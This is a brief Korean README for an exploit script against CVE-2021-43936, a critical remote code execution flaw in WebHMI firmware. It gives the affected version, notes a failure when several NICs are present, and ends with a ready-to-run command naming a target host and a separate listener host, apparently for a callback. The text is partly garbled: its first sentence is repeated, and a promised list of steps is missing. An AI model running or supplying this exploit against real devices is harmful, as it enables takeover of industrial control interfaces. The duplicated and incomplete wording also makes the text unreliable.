
CVE-2021-43936은 WebHMI 펌웨어에서 원격 코드 실행(RCE)을 유발하는 치명적인 취약점(CVSS3 10.0)입니다.
CVE-2021-43936은 WebHMI 펌웨어에서 원격 코드 실행(RCE)으로 이어지는 치명적인 취약점(CVSS3 10.0)입니다.
이 취약점은 버전 4.0 및 최신 버전에서 동작합니다.
4.0.7475에서만 테스트되었습니다. 스크립트는 다음 단계로 취약점을 이용합니다:
NIC가 둘 이상 연결되어 있으면 익스플로잇이 실패할 수 있습니다. 해결 방법은 다시 한 번 시도하는 것입니다.
python3 cve-2021-43936.py -t 10.100.23.200 -p 80 -l 10.100.23.201 -P 80
